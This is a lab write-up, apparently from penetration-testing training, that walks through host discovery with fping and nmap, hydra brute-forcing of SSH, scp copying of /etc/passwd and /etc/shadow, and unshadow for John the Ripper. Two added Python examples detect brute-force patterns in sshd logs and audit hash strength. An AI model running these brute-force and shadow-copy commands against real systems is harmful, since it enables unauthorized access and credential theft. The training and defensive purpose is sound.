The lab is divided into two main parts:
- Network authentication cracking
- Bruteforce and password cracking
In the first part of the lab you will have to use different network authentication cracking techniques and tools against services available on the target machine.
Once valid credentials have been found, it is time to download the passwords stored on the remote system and use John the Ripper to crack them!
I'm on the network.
Discover live hosts on the network with:
fping -a -g 192.168.99.0/24
192.168.99.22 is alive.
nmap -sC -sV -v 192.168.99.22
I guess we have to brute force both the username and the password of the ssh service. Not so sure about the telnet one. Let's run hydra against the target's ssh service.
hydra -L /usr/share/security/wordlists/ncrack/minimal.usr -P /usr/share/security/wordlists/SecLists/Passwords/Leaked-Databases/rockyou-10.txt -f ssh://192.168.99.22
Username and password found.
The same process can be used to exploit the telnet service.
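As an added example that is not part of the original lab notes, here is what the hydra run above looks like from the target's side: a small Python detector that parses sshd authentication log lines, counts failures per source address in a sliding time window, and flags a successful login that follows a run of failures from the same address (the pattern a wordlist attack leaves behind). The log lines, addresses and account names are constructed for the example; the threshold and window size are assumptions, not values from the lab.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample of sshd syslog lines (not from the lab machine); the
# addresses, ports and account names are made up for illustration.
SAMPLE_AUTH_LOG = """\
Mar  3 10:15:01 target sshd[2101]: Failed password for invalid user admin from 192.168.99.10 port 50112 ssh2
Mar  3 10:15:01 target sshd[2103]: Failed password for invalid user test from 192.168.99.10 port 50114 ssh2
Mar  3 10:15:02 target sshd[2105]: Failed password for root from 192.168.99.10 port 50116 ssh2
Mar  3 10:15:02 target sshd[2107]: Failed password for sysadmin from 192.168.99.10 port 50118 ssh2
Mar  3 10:15:03 target sshd[2109]: Failed password for sysadmin from 192.168.99.10 port 50120 ssh2
Mar  3 10:15:03 target sshd[2111]: Accepted password for sysadmin from 192.168.99.10 port 50122 ssh2
Mar  3 10:20:44 target sshd[2200]: Failed password for alice from 192.168.99.50 port 40001 ssh2
Mar  3 10:21:10 target sshd[2202]: Accepted publickey for alice from 192.168.99.50 port 40003 ssh2
"""

# Matches both "Failed password for invalid user X" and "Accepted publickey for X".
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def parse_line(line, year=2024):
    """Parse one sshd line into a dict, or return None for unrelated lines.
    Syslog timestamps carry no year, so one is assumed (hypothetical value)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}

def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return {source_ip: [alerts]} for lines in chronological order.
    - 'burst': at least `threshold` failures from the IP inside `window_seconds`
    - 'success_after_failures:<user>': an accepted login from an IP that already
      produced at least `threshold` failures (a guess that finally worked)
    """
    recent = defaultdict(deque)      # ip -> failure timestamps still in window
    failures_total = defaultdict(int)
    alerts = defaultdict(list)
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if ev is None:
            continue
        ip = ev["ip"]
        if ev["result"] == "Failed":
            q = recent[ip]
            q.append(ev["ts"])
            failures_total[ip] += 1
            # Slide the window: discard failures older than window_seconds.
            while q and (ev["ts"] - q[0]).total_seconds() > window_seconds:
                q.popleft()
            if len(q) >= threshold and "burst" not in alerts[ip]:
                alerts[ip].append("burst")
        elif failures_total[ip] >= threshold:
            alerts[ip].append(f"success_after_failures:{ev['user']}")
    return {ip: found for ip, found in alerts.items() if found}

if __name__ == "__main__":
    for ip, found in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(ip, found)
```

The single typo followed by a key-based login from 192.168.99.50 stays below the threshold and is not reported, while the five failures and then an accepted password from 192.168.99.10 produce both alerts; tuning the threshold and window to the environment's normal failure rate is what keeps the second alert meaningful.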
Let's ssh into the target.
Successfully logged in.
Let's download the password files and crack them using john.
Since python and python3 are not present on the server, let's copy the shadow file to the local machine with scp.
scp firstname.lastname@example.org:/etc/passwd .
scp email@example.com:/etc/shadow .
The sysadmin account cannot download the shadow file. Maybe I didn't get the root account. I ran hydra against ssh again using the rockyou-15.txt password file.
Now I can download the shadow file. Let's john the password files. First:
unshadow passwd shadow > unshadow.txt
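The unshadow step merges the two files so john gets one record per account with the hash in place. As an added example that is not part of the original notes, the following Python reproduces that merge and then classifies each account's effective password field by its crypt(3) prefix, which is what decides how quickly a wordlist run like the one above finishes: empty fields, MD5-crypt and DES-crypt fall fast, while SHA-512, bcrypt and yescrypt are the schemes a defender wants to find. The passwd and shadow excerpts and their hash strings are constructed placeholders, not data from the lab machine.

```python
# Constructed /etc/passwd and /etc/shadow excerpts (not from the lab machine);
# the hash strings are placeholders, not real crypt(3) output.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sysadmin:x:1000:1000:Sys Admin,,,:/home/sysadmin:/bin/bash
legacy:x:1001:1001::/home/legacy:/bin/bash
guest::1002:1002::/home/guest:/bin/sh
"""

SHADOW_SAMPLE = """\
root:$6$examplesalt$CONSTRUCTEDHASHNOTREAL:19700:0:99999:7:::
daemon:*:19700:0:99999:7:::
sysadmin:$y$j9T$examplesalt$CONSTRUCTEDHASHNOTREAL:19700:0:99999:7:::
legacy:$1$exsalt$CONSTRUCTEDHASHNOTREAL:19700:0:99999:7:::
"""

# crypt(3) prefix -> (algorithm, verdict). MD5-crypt and DES-crypt are cheap to
# compute and are the schemes a wordlist run exhausts quickly.
HASH_PREFIXES = {
    "$1$": ("md5-crypt", "weak"),
    "$2a$": ("bcrypt", "ok"), "$2b$": ("bcrypt", "ok"), "$2y$": ("bcrypt", "ok"),
    "$5$": ("sha256-crypt", "ok"),
    "$6$": ("sha512-crypt", "ok"),
    "$7$": ("scrypt", "ok"),
    "$y$": ("yescrypt", "ok"), "$gy$": ("gost-yescrypt", "ok"),
}

def parse_colon_file(text):
    """Map the user name (first field) of each non-empty line to its field list."""
    entries = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        entries[fields[0]] = fields
    return entries

def unshadow(passwd_text, shadow_text):
    """Merge passwd and shadow the way unshadow(8) does: the password field of
    each passwd line is replaced by the hash from the matching shadow entry."""
    shadow = parse_colon_file(shadow_text)
    merged = []
    for line in passwd_text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if fields[0] in shadow:
            fields[1] = shadow[fields[0]][1]
        merged.append(":".join(fields))
    return merged

def classify_hash(field):
    """Return (algorithm, verdict) for one password field."""
    if field == "":
        return ("none", "empty-password")     # login with no password at all
    if field.startswith(("!", "*")):
        return ("none", "locked")             # password login disabled
    for prefix, result in HASH_PREFIXES.items():
        if field.startswith(prefix):
            return result
    if "$" not in field and len(field) == 13:
        return ("descrypt", "weak")           # traditional 13-char DES crypt
    return ("unknown", "review")

def audit_accounts(passwd_text, shadow_text):
    """Classify every account's effective password field after the merge."""
    shadow = parse_colon_file(shadow_text)
    report = {}
    for name, fields in parse_colon_file(passwd_text).items():
        pw = fields[1]
        if pw == "x":                          # hash lives in shadow
            if name not in shadow:
                report[name] = ("missing-shadow", "review")
                continue
            pw = shadow[name][1]
        report[name] = classify_hash(pw)
    return report

def weak_accounts(passwd_text, shadow_text):
    """Names of accounts whose password field would fall quickly to a wordlist."""
    report = audit_accounts(passwd_text, shadow_text)
    return sorted(n for n, (_, verdict) in report.items()
                  if verdict in ("weak", "empty-password"))

if __name__ == "__main__":
    print("\n".join(unshadow(PASSWD_SAMPLE, SHADOW_SAMPLE)))
    print(weak_accounts(PASSWD_SAMPLE, SHADOW_SAMPLE))
```

Running it on real files means pointing the two parsers at /etc/passwd and /etc/shadow as root; the accounts it lists under `weak_accounts` are the ones to migrate to a modern scheme (or lock) before anyone else gets to run unshadow on them.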
Time elapsed: 1 hour 40 minutes.